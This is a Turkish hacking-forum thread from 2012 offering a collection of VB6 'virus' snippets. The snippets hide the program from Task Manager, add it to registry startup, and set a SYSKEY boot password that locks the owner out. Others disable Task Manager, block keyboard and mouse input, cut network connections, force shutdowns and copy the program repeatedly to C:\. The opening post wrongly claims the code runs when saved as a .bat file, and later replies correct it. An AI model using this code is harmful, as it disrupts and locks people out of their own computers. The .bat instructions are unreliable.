İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Metin Belgesinden Virüs Yapımı

16-02-2012 01:40
#1
saheser333 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2012
Nereden:
Bursa
Mesajlar:
47
Teşekkür (Etti):
4
Teşekkür (Aldı):
13
Konular:
5
Ticaret:
(0) %
Metin belgesinden virüs yapımı arkadaşlar coğu arkadaşımız bilebilir ben yine üstünden geçmek istedim.
Metin belgesini acıyoruz ve aşagıda bulunan yapmak istediğiniz herhangi bir virüsü metin belgesini yapıştırıyoruz ve farklı kaydetten Örnek: (sen.bat) Metin belgemizin sonuna farklı kaydette .bat olarak yapıyoruz. Ve virüs olmuş oluyor bazı antivirüs programları silebilir ama herhangi bir sakıncası yok sizin için ben hepsini denedim. Sakın kendiniz basmayın. 



Not: Bunlardan bazıları forumda mevcut olabilir ama tek konuda toplanması için yazdım . sizde yazarsanız iyi bir kaynak olacağını düşünüyorum.


Kod:
Private Sub Timer1_Timer()
Clipboard.Clear
Clipboard.SetText " turkhackteam.net"
End Sub
bu kod clipboard a turkhackteam.netkelimesini ekliyo ve copy/paste işleminde hep turkhackteam.net yazmasını sağlıyor

----------------------------

Kod:
me.hide
app.taskvisible=false
formun açılmaması ve görev yöneticisinde gözükmemesi için

----------------------------

Kod:
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
xp başlangıcına eklemek

----------------------------

Kod:
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Integer, ByVal lParam As Any) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const WM_SETTEXT = &HC
Dim yazi As String

Private Sub Form_Load()
yazi = "turkhackteam.net"
App.TaskVisible = False
Form1.Hide
End Sub

Private Sub Timer1_Timer()
Dim tWnd As Long, bWnd As Long

tWnd = FindWindow("Shell_TrayWnd", vbNullString)
bWnd = FindWindowEx(tWnd, ByVal 0&, "BUTTON", vbNullString)
SendMessage bWnd, WM_SETTEXT, &O0, yazi
End Sub
Başlat yazısını değiştirmek

----------------------------

Kod:
Private Sub Form_Load()
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\LegalNoticeCaption", "Turkhackteam.net"
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\LegalNoticeText", "Bilginin adresi"
End Sub
windows başlamadan önce okunması için pencere açar

----------------------------

Kod:
Private Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long

Private Sub Command1_Click()
mciExecute ("set cdaudio door open")
End Sub

Private Sub Command2_Click()
mciExecute ("set cdaudio door closed")
End Sub
cdrom açma ve kapama işlemini yapar

----------------------------

Kod:
Private Sub Form_Load()
App.TaskVisible = False
Form1.Visible = False
Shell "SYSKEY.EXE", vbNormalFocus
SendKeys "G", 1
SendKeys "B", 1
SendKeys "{TAB}", 1
SendKeys "turkhackteam.net", 1
SendKeys "{TAB}", 1
SendKeys "turkhackteam.net", 1
SendKeys "{ENTER}", 1
SendKeys "{ENTER}", 1
SendKeys "{ENTER}", 1
End
End Sub
xp başlangıç parolası koyar. xp açılmadan önce sorulur oturum açma ekranı gelmeden önce .

deneyenler şifrenin "turkhackteam.net" olduğunu unutmasın
----------------------------

Kod:
Shell "shutdown -s -t 20", vbHide
bilgisayarı kapatır
Kod:
Shell "shutdown -r -t 20", vbHide
yeniden başlatır
Kod:
Shell "shutdown -l -t 20", vbHide
oturumu kapatır
Kod:
Shell "shutdown -a", vbHide
kapatma işleminden çıkar
Kod:
Shell "shutdown -f", vbHide
çalışan uygulamaları uyarmadan kapanmaya zorlar


Kullanım: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\bilgisayaradı] [-t xx] [-c "yorum"] [-d up:xx:yy]

No args Bu iletiyi görüntüle (-? ile aynı)
-i GUI arabirimini görüntüle, ilk seçenek olmalı
-l Oturum kapat (-m seçeneği ile kullanılamaz)
-s Bilgisayarı kapat
-r Bilgisayarı kapat ve yeniden başlat
-a Sistem kapatmasından çık
-m \\bilgisayaradı Yeniden başlatmak/çıkmak için uzak bilgisayar
-t xx Kapatmak için zaman aşımını xx saniyeye ayarla
-c "comment" Kapatma yorumu (en çok 127 karakter)
-f çalışan uygulamaları uyarmadan kapanmaya zorlar
-d [u][p]:xx:yy Kapatma için neden kodu
u kullanıcı kodu
p planlı kapatma kodu
xx asıl neden kodu (256'dan küçük pozitif tamsayı)
yy ikincil neden kodu (65536'dan küçük pozitif tamsayı)


----------------------------
Kod:
Private Sub Form_Load()
Timer1.Interval = 100
End Sub

Private Sub Timer1_Timer()
Beep
End Sub
durmadan Beep sesi çıkarıyo gıçık edici bi kod

----------------------------
Kod:
Dim speech As SpVoice

Private Sub Command1_Click()
speech.Speak Text1
End Sub

Private Sub Form_Load()
Set speech = New SpVoice
End Sub
yazıları sese çevirir korkutmak için ideal durmadan hacked sesinin geldiğini düşünsenize

üstteki uygulama için 1 buton 1 text eklemeniz
ayrıca project > preferences sekmesinden microsoft speech object library eklemeniz gerekiyor.

----------------------------
Kod:
Private Sub Form_Load()
Printer.Print "www.turkhackteam.net.org Bilginin adresi"
End Sub
yazıcıdan çıktı almak ta gayet korkutucudur


-----------------------------
Kod:
Private Sub Form_Load()
Timer1.Interval = 100
End Sub

Private Sub Timer1_Timer()
SendKeys "hacked", 1
End Sub
hersaniye klavyeden hacked yazmış gibi olur. bir yazı yazması imkansız hale gelir
internet arama yapması internete girmesi imkansız hale gelir çünkü adresi yazmaz
hep hacked yazar

-----------------------------
Kod:
Shell "ipconfig /release"
eşleşen tüm bağlantıları serbest bırakır. Yani internet bağlantısını keser.

Kod:
Shell "ipconfig /renew"
tüm bağlantıları yeniler. tekrar ip adresi alıp internete bağlar.


-----------------------------

turkhacking®

Arkadaşlar bilgisayarın Görev Yöneticisini Kayapabilmek için gereken kodları aşağıya yazdım bu kodları formda yerine yerleştirirseniz CTRL+ALT+DEL e bastıgı zaman hazırladığınız programı kapanması için görevi sonlandırması gerekecek onuda yapmasına imkan vermiyecez..! Bunu uygulamak için öncelikle form a 2 tane Command butonu yerleştirelim ve bu aşağıdaki kodları form a yapıştırın.!
Command1: Görev Yöneticisini Aktif Yapmak için.
Command2: Görev Yöneticisini Kapatmak için.

Kod:
Option Explicit
Dim r As Long
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value
End Sub

Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"
End Sub

Public Property Get ReadKey(Value As String) As String
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
r = b.RegRead(Value)
ReadKey = r
End Property
Public Sub DeleteKey(Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("Wscript.Shell")
b.RegDelete Value
End Sub

' Simdi Taskmanager'i enable / diable yapabiliriz.
'0= enable, 1=disable
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskmgr", "1"
'KOMUTLAR BUTONLARA VERİLDİ AMA PUPLİC FONKSİYON NEDİR SORULACAK

' En kolayı birer fonksiyon yazarak onnları çağırmak. Fonksiyonları public yazın da program içinden her yerden çağırılsın:

Public Function Disabletaskmanager()
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskmgr", "1"
End Function

Public Function enabletaskmanager()
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskmgr", "0"
End Function

Private Sub Command1_Click()
call enabletaskmanager
End Sub

Private Sub Command2_Click()
call Disabletaskmanager
End Sub
Bitti... Bu en çok kullanılanıdır
Size tavsiyem Muhakkak timerların kod bölümüne koymanızdır disabled bölümlerini.
Çünkü karşıdaki enabled edebilmek için kod yazarsa kurtulması kolay olacaktır...

-----------------------------

Uncrgyer

Kod:
Private Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Private Sub Form_Load()
BlockInput True
End Sub
Klavye ve fareyi etkisiz hale getirir

----------------------------

AcTioN

Kod:
Private Sub Form_Load()
SendKeys "{HOME}"
SendKeys "{ENTER}"
End Sun
Buton eklemeniz gerekir. Sürekli enter yollayarak Mouse kilitlenmesini sağlar

----------------------------


Kod:
Private Sub Form_Load()
Timer1.Enabled = True
Timer1.Interval = 500
App.TaskVisible = False
On Error Resume Next
Me.Hide
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
Dim asia1, asia2, asia3, asia3
asia1 = Rnd * 100
asia2 = App.Path & "\" & App.EXEName & ".exe"
asia3 = asia1 & ".exe"
FileCopy yol, "c:\" & asia3 & ""
End Sub
Yarım saniyede C:\ diskine 100 adet kopyalar ve kendini gizler.Kendini windows açılış kayt defterine ekler boylece her açılışta yeniden açılır . . .

Saygılar.

Kullanıcı İmzası
Saygı Duyulacak Bir Tarafın Varsa O Tarafını Saygılarımla...

SingleStar
SekSek34, brk33 Teşekkür etti.

16-02-2012 01:43
#2
CwAyyildiz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
Antalya
Mesajlar:
63
Teşekkür (Etti):
0
Teşekkür (Aldı):
10
Konular:
3
Ticaret:
(0) %
Eline sağlıkta tam lamer işi
Kullanıcı İmzası
İmza editlendi İletişim Adresi Vererek İnsanlara Yardımcı Olmak Yasak Çünkü Deilmi ?
SekSek34, hajking Teşekkür etti.
16-02-2012 17:02
#3
DeerFlord - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2012
Mesajlar:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
0
Ticaret:
(0) %
aynen ama yinede iş görür
Kullanıcı İmzası
Sıradaki Sensin
SekSek34 Teşekkür etti.
26-05-2012 20:00
#4
brk33 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Mesajlar:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
tşk ama inş. çalışır ben pek sannet miyorum işe yaricanı ama denicez...
01-06-2012 17:37
#5
hajking - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
22
Mesajlar:
774
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Konular:
26
Ticaret:
(0) %
arkadaşım senin kod bilgin yok galiba bunları metin belgesine yapıştırıp uzantısını .bat yapamazsın bunlar vb6 dilinde ki kodlar
dip not: bunlar dan virüs olmaz kusura bakma lütfen yanlış bilgiler verip de kendi vatandaşlarını şaşırtma
konu açmış olmak için açma gerçekten iyi olduğun konu üzerine aç konuyu başka sitelerden kopyala yapıştır yapma
05-06-2012 19:26
#6
Üyelik tarihi:
04/2012
Nereden:
hatay
Mesajlar:
134
Teşekkür (Etti):
5
Teşekkür (Aldı):
22
Konular:
18
Ticaret:
(0) %
of çok iyi yaaa çok basitt eline sağlık
05-06-2012 20:08
#7
by sad - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Yaş:
22
Mesajlar:
14
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
0
Ticaret:
(0) %
evet buradaki kodlar vb için ayrıca bunlar dan virüs olmaz
06-06-2012 16:51
#8
S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.801
Teşekkür (Etti):
968
Teşekkür (Aldı):
3104
Konular:
1516
Ticaret:
(0) %
Sadece metin belgesine kodlari yapistir kaydetip virusmu olcak neoclak
06-06-2012 18:58
#9
PerpetuuM - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2011
Mesajlar:
19
Teşekkür (Etti):
3
Teşekkür (Aldı):
0
Konular:
2
Ticaret:
(0) %
Eline sağlık güzel olmuş da arkadaşların dediği gibi lamer işi
Kullanıcı İmzası
Bizim gibi mi olmak istiyorsun, ilk adam olmalısın! Bilgisayardan anlıyorum diyorsan, bize yetişiyorsun-dur. Bize yetişmek istiyorsan, bizim gibi olman gerekir! Bizim gibi olmak istiyorsan, THT'ye üye olman gerekir! THT'ye üye isen bizim gibisin demektir!

TurkHackTeam / PerpetuuM

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı